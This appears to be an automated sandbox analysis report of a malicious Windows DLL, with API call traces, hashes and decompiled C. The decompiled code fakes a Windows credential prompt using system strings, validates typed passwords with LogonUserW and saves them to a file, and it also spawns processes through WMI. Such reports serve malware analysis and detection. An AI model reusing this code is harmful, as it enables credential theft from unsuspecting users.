                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 6F33A072
                                                                                                                        • FormatMessageW.KERNEL32(00000AFF,00000000,B0000002,00000000,00000000,000001F4,00000000), ref: 6F33A093
                                                                                                                        • FormatMessageW.KERNEL32(00000AFF,00000000,50000004,00000000,000003E8,00000064,00000000), ref: 6F33A0B1
                                                                                                                        • MessageBoxW.USER32(00000000,00000000,000003E8,00000040), ref: 6F33A0BD
                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 6F33A0C8
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F33A0D1
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F33A0D8
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,00000001,FF000000), ref: 6F33A0E3
                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 6F33A0EF
                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000001,FF000000), ref: 6F33A0F7
                                                                                                                        • CoUninitialize.OLE32 ref: 6F33A0FD
                                                                                                                        • SwitchDesktop.USER32(00000000), ref: 6F33A109
                                                                                                                        • SetThreadDesktop.USER32(00000000), ref: 6F33A116
                                                                                                                          • Part of subcall function 6F331DB0: lstrlenA.KERNEL32(00000000,00000000), ref: 6F331E3E
                                                                                                                          • Part of subcall function 6F331DB0: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 6F331E48
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Load$HeapString$Free$DesktopLibraryMessageProcess$AllocFormatSleepwsprintf$LocalPathSwitchThreadlstrlen$BuildCommandComputeCrc32DriveInformationInitializeLineMemoryNumberRootUninitializeVolumeZero
                                                                                                                        • String ID: %s%s$/c start /b "" "%s" f w %d$<n/a>$DFDWiz.exe$`$comctl32.dll
                                                                                                                        • API String ID: 3108343870-2776518243
                                                                                                                        • Opcode ID: ecaf68d1970cbbc817ad17a9d3c1f9accc9bc5c5c3191fd046d90c7fd459eda3
                                                                                                                        • Instruction ID: fc877c8d6a33d97534f31cc0a69ba9fb648d905e22f708a5f35fd157cffaf9bb
                                                                                                                        • Opcode Fuzzy Hash: ecaf68d1970cbbc817ad17a9d3c1f9accc9bc5c5c3191fd046d90c7fd459eda3
                                                                                                                        • Instruction Fuzzy Hash: B3B1937254478AAFEB20DFA0CC85F9B7BADEB45B10F00481CF255961C0DBB5E414CB26
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 47%
                                                                                                                        			E6F3396D0(intOrPtr _a4) {
                                                                                                                        				intOrPtr _v4;
                                                                                                                        				signed int _v72;
                                                                                                                        				char _v1028;
                                                                                                                        				short _v1036;
                                                                                                                        				char _v1048;
                                                                                                                        				void* _v1296;
                                                                                                                        				char _v1300;
                                                                                                                        				void* _v1304;
                                                                                                                        				intOrPtr _v1308;
                                                                                                                        				void* _v1312;
                                                                                                                        				void* _v1316;
                                                                                                                        				void* _v1320;
                                                                                                                        				intOrPtr _v1324;
                                                                                                                        				void* _v1328;
                                                                                                                        				void* _v1332;
                                                                                                                        				void* _v1336;
                                                                                                                        				intOrPtr _v1340;
                                                                                                                        				void* _v1344;
                                                                                                                        				void* _v1348;
                                                                                                                        				void* _v1352;
                                                                                                                        				char _v1356;
                                                                                                                        				WCHAR* _v1368;
                                                                                                                        				short* _v1372;
                                                                                                                        				char _v1376;
                                                                                                                        				void* _v1380;
                                                                                                                        				intOrPtr _v1384;
                                                                                                                        				void* _v1392;
                                                                                                                        				intOrPtr _v1396;
                                                                                                                        				struct HINSTANCE__* _v1400;
                                                                                                                        				void* _v1404;
                                                                                                                        				char _v1412;
                                                                                                                        				char _v1416;
                                                                                                                        				void* _v1420;
                                                                                                                        				long _v1424;
                                                                                                                        				long _v1432;
                                                                                                                        				long _v1436;
                                                                                                                        				long _v1448;
                                                                                                                        				intOrPtr _v1452;
                                                                                                                        				long _v1456;
                                                                                                                        				intOrPtr _v1472;
                                                                                                                        				char _v1480;
                                                                                                                        				char _v1496;
                                                                                                                        				intOrPtr _v1500;
                                                                                                                        				intOrPtr _v1508;
                                                                                                                        				intOrPtr _v1524;
                                                                                                                        				void* _v1532;
                                                                                                                        				intOrPtr _v1544;
                                                                                                                        				void* _v1556;
                                                                                                                        				void* _t93;
                                                                                                                        				void* _t94;
                                                                                                                        				void* _t99;
                                                                                                                        				CHAR* _t106;
                                                                                                                        				void* _t110;
                                                                                                                        				void* _t133;
                                                                                                                        				int _t140;
                                                                                                                        				signed int _t145;
                                                                                                                        				struct HDESK__* _t149;
                                                                                                                        				void* _t152;
                                                                                                                        				struct HINSTANCE__* _t154;
                                                                                                                        				void* _t155;
                                                                                                                        				WCHAR* _t156;
                                                                                                                        				WCHAR* _t157;
                                                                                                                        				struct HDESK__* _t158;
                                                                                                                        				struct HDESK__* _t171;
                                                                                                                        				WCHAR* _t174;
                                                                                                                        				WCHAR* _t180;
                                                                                                                        				struct HDESK__* _t183;
                                                                                                                        				WCHAR* _t185;
                                                                                                                        				struct HINSTANCE__* _t188;
                                                                                                                        				short* _t190;
                                                                                                                        				void* _t191;
                                                                                                                        				signed int _t195;
                                                                                                                        				signed int _t196;
                                                                                                                        				WCHAR* _t199;
                                                                                                                        				long _t200;
                                                                                                                        				short* _t202;
                                                                                                                        				void* _t204;
                                                                                                                        				void* _t205;
                                                                                                                        				void* _t206;
                                                                                                                        
                                                                                                                        				_t93 = M6F340504; // 0xa59868
                                                                                                                        				_t157 = M6F3404F8; // 0xa56660
                                                                                                                        				_t94 = E6F335130(_t157, _t93, 0x6f33d664);
                                                                                                                        				_t204 =  &_v1416 + 0xc;
                                                                                                                        				if(_t94 != 0) {
                                                                                                                        					L39:
                                                                                                                        					return 0;
                                                                                                                        				} else {
                                                                                                                        					_t152 = 0;
                                                                                                                        					if(_a4 != 0) {
                                                                                                                        						_t183 =  *0x6f340480; // 0x0
                                                                                                                        						SwitchDesktop(_t183);
                                                                                                                        						_t149 =  *0x6f340480; // 0x0
                                                                                                                        						SetThreadDesktop(_t149);
                                                                                                                        					}
                                                                                                                        					_t188 = LoadLibraryA("credui.dll");
                                                                                                                        					_v1380 = _t188;
                                                                                                                        					if(_t188 == _t152) {
                                                                                                                        						L37:
                                                                                                                        						if(_a4 != _t152) {
                                                                                                                        							Sleep(0x7d0);
                                                                                                                        							_t158 =  *0x6f340484; // 0x0
                                                                                                                        							SwitchDesktop(_t158);
                                                                                                                        							_t171 =  *0x6f340484; // 0x0
                                                                                                                        							SetThreadDesktop(_t171);
                                                                                                                        						}
                                                                                                                        						goto L39;
                                                                                                                        					}
                                                                                                                        					_push(0xff000000);
                                                                                                                        					_push(4);
                                                                                                                        					_push( &_v1356);
                                                                                                                        					_push(_t188);
                                                                                                                        					_v1356 = 0x24bec39d;
                                                                                                                        					_v1352 = _t152;
                                                                                                                        					_v1348 = _t152;
                                                                                                                        					_v1344 = _t152;
                                                                                                                        					_v1340 = 0xb4bb2c26;
                                                                                                                        					_v1336 = _t152;
                                                                                                                        					_v1332 = _t152;
                                                                                                                        					_v1328 = _t152;
                                                                                                                        					_v1324 = 0x4b177521;
                                                                                                                        					_v1320 = _t152;
                                                                                                                        					_v1316 = _t152;
                                                                                                                        					_v1312 = _t152;
                                                                                                                        					_v1308 = 0xc07eb83e;
                                                                                                                        					_v1304 = _t152;
                                                                                                                        					_v1300 = _t152;
                                                                                                                        					_v1296 = _t152;
                                                                                                                        					_t99 = E6F331DB0();
                                                                                                                        					_t205 = _t204 + 0x10;
                                                                                                                        					if(_t99 == 0) {
                                                                                                                        						L36:
                                                                                                                        						FreeLibrary(_t188);
                                                                                                                        						goto L37;
                                                                                                                        					}
                                                                                                                        					_t185 = HeapAlloc(GetProcessHeap(), 8, 0x2000);
                                                                                                                        					if(_t185 == _t152) {
                                                                                                                        						L35:
                                                                                                                        						goto L36;
                                                                                                                        					}
                                                                                                                        					_push(0x14);
                                                                                                                        					_push( &_v1376);
                                                                                                                        					L6F33C2EE();
                                                                                                                        					_v1384 = 0x14;
                                                                                                                        					_v1380 = _t152;
                                                                                                                        					_v1412 = 0x202;
                                                                                                                        					_v1396 = 0x101;
                                                                                                                        					_t26 =  &(_t185[0x657]); // 0xcae
                                                                                                                        					_t190 = _t26;
                                                                                                                        					_t27 =  &(_t185[0x6d8]); // 0xdb0
                                                                                                                        					_t199 = _t27;
                                                                                                                        					GetSystemDirectoryA( &_v1300, 0x104);
                                                                                                                        					PathAddBackslashA( &_v1300);
                                                                                                                        					_t106 = "rstrui.exe";
                                                                                                                        					if(_v4 != _t152) {
                                                                                                                        						_t106 = "wuaueng.dll";
                                                                                                                        					}
                                                                                                                        					lstrcatA( &_v1300, _t106);
                                                                                                                        					_t154 = LoadLibraryExA( &_v1300, _t152, 0x20);
                                                                                                                        					if(_t154 == 0) {
                                                                                                                        						L20:
                                                                                                                        						_t174 = M6F3404F8; // 0xa56660
                                                                                                                        						_t110 = M6F340504; // 0xa59868
                                                                                                                        						_t200 = 0;
                                                                                                                        						_t191 = 0;
                                                                                                                        						_v1392 = 0;
                                                                                                                        						_v1424 = 0;
                                                                                                                        						_v1416 = 0;
                                                                                                                        						_v1404 = 0;
                                                                                                                        						_v1420 = 0;
                                                                                                                        						wsprintfW( &_v1036, L"%s\\%s", _t110, _t174);
                                                                                                                        						_t206 = _t205 + 0x10;
                                                                                                                        						_push( &_v1412);
                                                                                                                        						_push(0);
                                                                                                                        						_push(0x6f33d664);
                                                                                                                        						_push( &_v1028);
                                                                                                                        						_push(0);
                                                                                                                        						if(_v1296() != 0 || GetLastError() != 0x7a) {
                                                                                                                        							L34:
                                                                                                                        							HeapFree(GetProcessHeap(), _t200, _t185);
                                                                                                                        							_t188 = _v1400;
                                                                                                                        							_t152 = 0;
                                                                                                                        							goto L35;
                                                                                                                        						} else {
                                                                                                                        							_t155 = HeapAlloc(GetProcessHeap(), 8, _v1432);
                                                                                                                        							_v1420 = _t155;
                                                                                                                        							if(_t155 == 0) {
                                                                                                                        								goto L34;
                                                                                                                        							}
                                                                                                                        							_push( &_v1432);
                                                                                                                        							_push(_t155);
                                                                                                                        							_push(0x6f33d664);
                                                                                                                        							_push( &_v1048);
                                                                                                                        							_push(0);
                                                                                                                        							if(_v1316() == 0) {
                                                                                                                        								L33:
                                                                                                                        								HeapFree(GetProcessHeap(), _t200, _t155);
                                                                                                                        								goto L34;
                                                                                                                        							}
                                                                                                                        							while(1) {
                                                                                                                        								L25:
                                                                                                                        								_push(0x20);
                                                                                                                        								_push( &_v1436);
                                                                                                                        								_push( &_v1448);
                                                                                                                        								_push( &_v1456);
                                                                                                                        								_push(_v1452);
                                                                                                                        								_push(_t155);
                                                                                                                        								_push( &_v1424);
                                                                                                                        								_push(_t191);
                                                                                                                        								_push( &_v1416);
                                                                                                                        								_v1432 = 1;
                                                                                                                        								_v1424 = _t200;
                                                                                                                        								_v1456 = _t200;
                                                                                                                        								_v1448 = _t200;
                                                                                                                        								_v1436 = _t200;
                                                                                                                        								if(_v1384() != 0) {
                                                                                                                        									break;
                                                                                                                        								}
                                                                                                                        								_push(0x404);
                                                                                                                        								_push(_t185);
                                                                                                                        								_v1480 = 0x202;
                                                                                                                        								L6F33C2EE();
                                                                                                                        								_push(0x202);
                                                                                                                        								_t74 =  &(_t185[0x202]); // 0x404
                                                                                                                        								_t156 = _t74;
                                                                                                                        								_push(_t156);
                                                                                                                        								_v1472 = 0x101;
                                                                                                                        								L6F33C2EE();
                                                                                                                        								_push( &_v1480);
                                                                                                                        								_push(_t156);
                                                                                                                        								_push(_t200);
                                                                                                                        								_push(_t200);
                                                                                                                        								_push( &_v1496);
                                                                                                                        								_push(_t185);
                                                                                                                        								_push(_v1500);
                                                                                                                        								_push(_v1508);
                                                                                                                        								_push(1);
                                                                                                                        								if(_v1420() != 0) {
                                                                                                                        									_push(0x404);
                                                                                                                        									_t81 =  &(_t185[0x303]); // 0x606
                                                                                                                        									_t202 = _t81;
                                                                                                                        									_push(_t202);
                                                                                                                        									L6F33C2EE();
                                                                                                                        									_push(0x2a4);
                                                                                                                        									_t82 =  &(_t185[0x505]); // 0xa0a
                                                                                                                        									L6F33C2EE();
                                                                                                                        									_push(0x152);
                                                                                                                        									_t83 =  &(_t185[0x505]); // 0xa0a
                                                                                                                        									_push(0x202);
                                                                                                                        									_push(_t202);
                                                                                                                        									_push(_t185);
                                                                                                                        									if(_v1456() == 0) {
                                                                                                                        										_t85 =  &(_t185[0x505]); // 0xa0a
                                                                                                                        										_t133 = E6F335130(_t202, _t85, _t156);
                                                                                                                        										_t206 = _t206 + 0xc;
                                                                                                                        										if(_t133 == 0) {
                                                                                                                        											_v1556 = 0;
                                                                                                                        											_t191 = 0x52e;
                                                                                                                        										} else {
                                                                                                                        											_t180 = M6F3404D0; // 0xa58418
                                                                                                                        											WritePrivateProfileStringW(L"PWD", _t185, _t156, _t180);
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        									_t200 = 0;
                                                                                                                        								}
                                                                                                                        								__imp__CoTaskMemFree(_v1544);
                                                                                                                        								_t155 = _v1532;
                                                                                                                        								if(_v1524 == _t200) {
                                                                                                                        									continue;
                                                                                                                        								} else {
                                                                                                                        									goto L33;
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        							asm("sbb esi, esi");
                                                                                                                        							_t191 = ( ~_v72 & 0xfffff693) + 0xfdb;
                                                                                                                        							Sleep(0x1f4);
                                                                                                                        							goto L25;
                                                                                                                        						}
                                                                                                                        					} else {
                                                                                                                        						_push(0x80);
                                                                                                                        						_push(_t190);
                                                                                                                        						if(_v4 != 0) {
                                                                                                                        							if(LoadStringW(_t154, 0x69, ??, ??) > 0) {
                                                                                                                        								_v1372 = _t190;
                                                                                                                        							}
                                                                                                                        							_t195 = FormatMessageW(0xaff, _t154, 0xb0000028, 0, _t199, 0x926, 0);
                                                                                                                        							_t196 = _t195 + LoadStringW(_t154, 0x184,  &(_t199[_t195]), 0x926 - _t195);
                                                                                                                        							_t140 = wsprintfW( &(_t199[_t196]), L"\r\n\r\n");
                                                                                                                        							_t205 = _t205 + 8;
                                                                                                                        							FormatMessageW(0x12ff, 0, 0x1109, 0,  &(_t199[_t196 + _t140]), 0x926 - _t196 + _t140, 0);
                                                                                                                        							L18:
                                                                                                                        							_v1368 = _t199;
                                                                                                                        							L19:
                                                                                                                        							FreeLibrary(_t154);
                                                                                                                        							goto L20;
                                                                                                                        						}
                                                                                                                        						_t145 = LoadStringW(_t154, 0xab, ??, ??);
                                                                                                                        						if(_t145 > 0) {
                                                                                                                        							_t34 = _t145 * 2; // 0xcb2
                                                                                                                        							_t190[_t145] = 0x20002e;
                                                                                                                        							if(LoadStringW(_t154, 0x91, _t190 + _t34 + 4, 0x80 - _t145) > 0) {
                                                                                                                        								_v1372 = _t190;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						if(LoadStringW(_t154, 0xd2, _t199, 0x926) <= 0) {
                                                                                                                        							goto L19;
                                                                                                                        						} else {
                                                                                                                        							goto L18;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 6F335130: LogonUserW.ADVAPI32(00A56660,00A56660,6F3396ED,00000002,00000000,00A59868), ref: 6F335150
                                                                                                                          • Part of subcall function 6F335130: GetLastError.KERNEL32 ref: 6F33515C
                                                                                                                          • Part of subcall function 6F335130: CloseHandle.KERNEL32(?), ref: 6F335177
                                                                                                                        • SwitchDesktop.USER32(00000000,00000000,00000000), ref: 6F33970C
                                                                                                                        • SetThreadDesktop.USER32(00000000), ref: 6F339718
                                                                                                                        • LoadLibraryA.KERNEL32(credui.dll,00000000,00000000), ref: 6F339723
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00002000,00000000,00000000,?,00000004,FF000000), ref: 6F3397BB
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F3397C2
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000014), ref: 6F3397DA
                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 6F339814
                                                                                                                        • PathAddBackslashA.SHLWAPI(?), ref: 6F339822
                                                                                                                        • lstrcatA.KERNEL32(?,rstrui.exe), ref: 6F339844
                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000020), ref: 6F339855
                                                                                                                        • LoadStringW.USER32(00000000,000000AB,00000CAE,00000080), ref: 6F33987B
                                                                                                                        • LoadStringW.USER32(00000000,00000091,00000CB2,00000080), ref: 6F33989F
                                                                                                                        • LoadStringW.USER32(00000000,000000D2,00000DB0,00000926), ref: 6F3398B9
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000926,00000000,?,?,00000104,?,00000014,74784F20), ref: 6F339952
                                                                                                                        • wsprintfW.USER32 ref: 6F33998A
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,00000104,?,00000014,74784F20), ref: 6F3399B6
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,00000104,?,00000014,74784F20), ref: 6F3399CC
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000104,?,00000014,74784F20), ref: 6F3399D3
                                                                                                                        • RtlZeroMemory.NTDLL(00000000,00000404), ref: 6F339A64
                                                                                                                        • RtlZeroMemory.NTDLL(00000404,00000202), ref: 6F339A7D
                                                                                                                        • RtlZeroMemory.NTDLL(00000606,00000404), ref: 6F339AB3
                                                                                                                        • RtlZeroMemory.NTDLL(00000A0A,000002A4), ref: 6F339AC4
                                                                                                                        • WritePrivateProfileStringW.KERNEL32(PWD,00000000,00000404,00A58418), ref: 6F339B0A
                                                                                                                        • CoTaskMemFree.OLE32(?), ref: 6F339B26
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00000104,?,00000014,74784F20), ref: 6F339B3C
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,00000104,?,00000014,74784F20), ref: 6F339B43
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00000104,?,00000014,74784F20), ref: 6F339B4B
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,00000104,?,00000014,74784F20), ref: 6F339B52
                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000000,?,00000004,FF000000), ref: 6F339B61
                                                                                                                        • Sleep.KERNEL32(000007D0), ref: 6F339B77
                                                                                                                        • SwitchDesktop.USER32(00000000), ref: 6F339B84
                                                                                                                        • SetThreadDesktop.USER32(00000000), ref: 6F339B91
                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 6F339BBE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$FreeLoadMemoryZero$DesktopLibraryProcessString$AllocErrorLastSleepSwitchThread$BackslashCloseDirectoryHandleLogonPathPrivateProfileSystemTaskUserWritelstrcatwsprintf
                                                                                                                        • String ID: $%s\%s$PWD$credui.dll$rstrui.exe$wuaueng.dll
                                                                                                                        • API String ID: 938628543-1540689510
                                                                                                                        • Opcode ID: 5f5f92134826d2561201cf5ef8132b4256d3da89c9e14607fc0fb722c7e44eb4
                                                                                                                        • Instruction ID: fd8a445435fc3b6a829dbbcb351fdb4702dcea6a5c0bca04883be252e6cc30e8
                                                                                                                        • Opcode Fuzzy Hash: 5f5f92134826d2561201cf5ef8132b4256d3da89c9e14607fc0fb722c7e44eb4
                                                                                                                        • Instruction Fuzzy Hash: 60D191B2A04399EFE720DF65CC88F5BBBEDFB89710F00491DFA8596141DB70A4148B62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 32%
                                                                                                                        			E6F3329D0() {
                                                                                                                        				intOrPtr _v56;
                                                                                                                        				void* _v76;
                                                                                                                        				intOrPtr* _v100;
                                                                                                                        				long _v116;
                                                                                                                        				char _v120;
                                                                                                                        				intOrPtr _v132;
                                                                                                                        				intOrPtr* _v140;
                                                                                                                        				intOrPtr _v160;
                                                                                                                        				intOrPtr _v168;
                                                                                                                        				long _v176;
                                                                                                                        				char _v180;
                                                                                                                        				intOrPtr* _v192;
                                                                                                                        				intOrPtr* _v196;
                                                                                                                        				intOrPtr _v204;
                                                                                                                        				char _v208;
                                                                                                                        				char _v212;
                                                                                                                        				intOrPtr* _v224;
                                                                                                                        				intOrPtr _v228;
                                                                                                                        				intOrPtr* _v236;
                                                                                                                        				intOrPtr* _v240;
                                                                                                                        				void* _v248;
                                                                                                                        				intOrPtr* _v252;
                                                                                                                        				intOrPtr _v256;
                                                                                                                        				intOrPtr* _v264;
                                                                                                                        				intOrPtr* _v272;
                                                                                                                        				long _v276;
                                                                                                                        				char _v280;
                                                                                                                        				short _v284;
                                                                                                                        				char _v288;
                                                                                                                        				short _v292;
                                                                                                                        				intOrPtr* _v300;
                                                                                                                        				intOrPtr* _v304;
                                                                                                                        				void* _v308;
                                                                                                                        				void* _v312;
                                                                                                                        				char _v316;
                                                                                                                        				intOrPtr* _v324;
                                                                                                                        				intOrPtr* _v336;
                                                                                                                        				long _v352;
                                                                                                                        				char _v356;
                                                                                                                        				intOrPtr* _v360;
                                                                                                                        				intOrPtr _v376;
                                                                                                                        				intOrPtr* _v380;
                                                                                                                        				intOrPtr _v384;
                                                                                                                        				intOrPtr _v392;
                                                                                                                        				intOrPtr* _v396;
                                                                                                                        				char* _t83;
                                                                                                                        				void* _t85;
                                                                                                                        				intOrPtr* _t86;
                                                                                                                        				void* _t87;
                                                                                                                        				intOrPtr* _t88;
                                                                                                                        				intOrPtr _t91;
                                                                                                                        				intOrPtr* _t92;
                                                                                                                        				intOrPtr _t94;
                                                                                                                        				intOrPtr* _t95;
                                                                                                                        				void* _t98;
                                                                                                                        				intOrPtr* _t99;
                                                                                                                        				void* _t101;
                                                                                                                        				intOrPtr* _t102;
                                                                                                                        				intOrPtr* _t104;
                                                                                                                        				intOrPtr* _t107;
                                                                                                                        				intOrPtr* _t110;
                                                                                                                        				intOrPtr* _t113;
                                                                                                                        				intOrPtr* _t116;
                                                                                                                        				intOrPtr* _t118;
                                                                                                                        				intOrPtr* _t121;
                                                                                                                        				intOrPtr* _t124;
                                                                                                                        				short _t127;
                                                                                                                        				intOrPtr* _t132;
                                                                                                                        				intOrPtr* _t137;
                                                                                                                        				void* _t139;
                                                                                                                        				intOrPtr* _t140;
                                                                                                                        				intOrPtr _t142;
                                                                                                                        				intOrPtr* _t145;
                                                                                                                        				void* _t148;
                                                                                                                        				intOrPtr* _t151;
                                                                                                                        				void* _t153;
                                                                                                                        				intOrPtr* _t154;
                                                                                                                        				short _t157;
                                                                                                                        				char _t158;
                                                                                                                        				void* _t208;
                                                                                                                        				intOrPtr _t211;
                                                                                                                        				intOrPtr* _t212;
                                                                                                                        				void* _t213;
                                                                                                                        				void* _t215;
                                                                                                                        				void* _t216;
                                                                                                                        				void* _t217;
                                                                                                                        				void* _t218;
                                                                                                                        				intOrPtr* _t219;
                                                                                                                        				void* _t220;
                                                                                                                        
                                                                                                                        				_v56 = 0;
                                                                                                                        				__imp__CoInitializeEx(0, 6);
                                                                                                                        				_t83 =  &_v76;
                                                                                                                        				_v76 = 0;
                                                                                                                        				__imp__CoCreateInstance(0x6f33df9c, 0, 1, 0x6f33decc, _t83);
                                                                                                                        				if(_t83 < 0) {
                                                                                                                        					return 0;
                                                                                                                        				} else {
                                                                                                                        					_t158 = "voker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x787680
                                                                                                                        					_t154 = __imp__#2;
                                                                                                                        					_v116 = 0;
                                                                                                                        					_t85 =  *_t154(_t158, _t208, _t153);
                                                                                                                        					_t215 = _t85;
                                                                                                                        					_t86 = _v100;
                                                                                                                        					_t87 =  *((intOrPtr*)( *((intOrPtr*)( *_t86 + 0xc))))(_t86, _t215, 0, 0, 0, 0, 0, 0,  &_v120);
                                                                                                                        					__imp__#6(_t215);
                                                                                                                        					if(_t87 >= 0) {
                                                                                                                        						_t91 = _v160;
                                                                                                                        						__imp__CoSetProxyBlanket(_t91, 0xa, 0, 0, 3, 3, 0, 0);
                                                                                                                        						if(_t91 >= 0) {
                                                                                                                        							_v176 = 0;
                                                                                                                        							_t94 =  *_t154(L"Win32_Process");
                                                                                                                        							_push(0);
                                                                                                                        							_push( &_v180);
                                                                                                                        							_push(0);
                                                                                                                        							_t211 = _t94;
                                                                                                                        							_t95 = _v196;
                                                                                                                        							_push(0);
                                                                                                                        							_push(_t211);
                                                                                                                        							_push(_t95);
                                                                                                                        							_v168 = _t211;
                                                                                                                        							if( *((intOrPtr*)( *((intOrPtr*)( *_t95 + 0x18))))() >= 0) {
                                                                                                                        								_v208 = 0;
                                                                                                                        								_t98 =  *_t154(L"Win32_ProcessStartup");
                                                                                                                        								_t216 = _t98;
                                                                                                                        								_t99 = _v224;
                                                                                                                        								_t101 =  *((intOrPtr*)( *((intOrPtr*)( *_t99 + 0x18))))(_t99, _t216, 0, 0,  &_v212, 0);
                                                                                                                        								__imp__#6(_t216);
                                                                                                                        								if(_t101 >= 0) {
                                                                                                                        									_t104 = _v240;
                                                                                                                        									_push( &_v248);
                                                                                                                        									_v248 = 0;
                                                                                                                        									_push(0);
                                                                                                                        									_push(_t104);
                                                                                                                        									if( *((intOrPtr*)( *((intOrPtr*)( *_t104 + 0x3c))))() >= 0) {
                                                                                                                        										_t212 = __imp__#8;
                                                                                                                        										 *_t212( &_v208);
                                                                                                                        										_t110 = _v264;
                                                                                                                        										_v212 = 2;
                                                                                                                        										_v204 = 1;
                                                                                                                        										 *((intOrPtr*)( *((intOrPtr*)( *_t110 + 0x14))))(_t110, L"ShowWindow", 0,  &_v212, 0);
                                                                                                                        										_t113 = _v272;
                                                                                                                        										_push(0);
                                                                                                                        										_push( &_v280);
                                                                                                                        										_push(0);
                                                                                                                        										_v280 = 0;
                                                                                                                        										_push(L"Create");
                                                                                                                        										_push(_t113);
                                                                                                                        										if( *((intOrPtr*)( *((intOrPtr*)( *_t113 + 0x4c))))() >= 0) {
                                                                                                                        											_t118 = _v300;
                                                                                                                        											_push( &_v312);
                                                                                                                        											_v312 = 0;
                                                                                                                        											_push(0);
                                                                                                                        											_push(_t118);
                                                                                                                        											if( *((intOrPtr*)( *((intOrPtr*)( *_t118 + 0x3c))))() >= 0) {
                                                                                                                        												_t217 = E6F33A360(_v228, 0, 0);
                                                                                                                        												if(_t217 != 0) {
                                                                                                                        													_t127 = lstrlenW(_t217) + 2;
                                                                                                                        													__imp__#4(_t217, _t127);
                                                                                                                        													_t157 = _t127;
                                                                                                                        													HeapFree(GetProcessHeap(), 0, _t217);
                                                                                                                        													if(_t157 != 0) {
                                                                                                                        														 *_t212( &_v288);
                                                                                                                        														_v292 = 8;
                                                                                                                        														_t132 = _v336;
                                                                                                                        														_v284 = _t157;
                                                                                                                        														 *((intOrPtr*)( *((intOrPtr*)( *_t132 + 0x14))))(_t132, L"CommandLine", 0,  &_v292, 0);
                                                                                                                        														_t135 = _v256;
                                                                                                                        														_t213 = 0;
                                                                                                                        														if(_v256 != 0) {
                                                                                                                        															_t148 = E6F33A360(_t135, 0, 0);
                                                                                                                        															_t220 = _t148;
                                                                                                                        															if(_t220 != 0) {
                                                                                                                        																__imp__#2(_t220);
                                                                                                                        																_t213 = _t148;
                                                                                                                        																if(_t213 != 0) {
                                                                                                                        																	_t151 = _v360;
                                                                                                                        																	_v316 = 8;
                                                                                                                        																	_v308 = _t213;
                                                                                                                        																	 *((intOrPtr*)( *((intOrPtr*)( *_t151 + 0x14))))(_t151, L"CurrentDirectory", 0,  &_v316, 0);
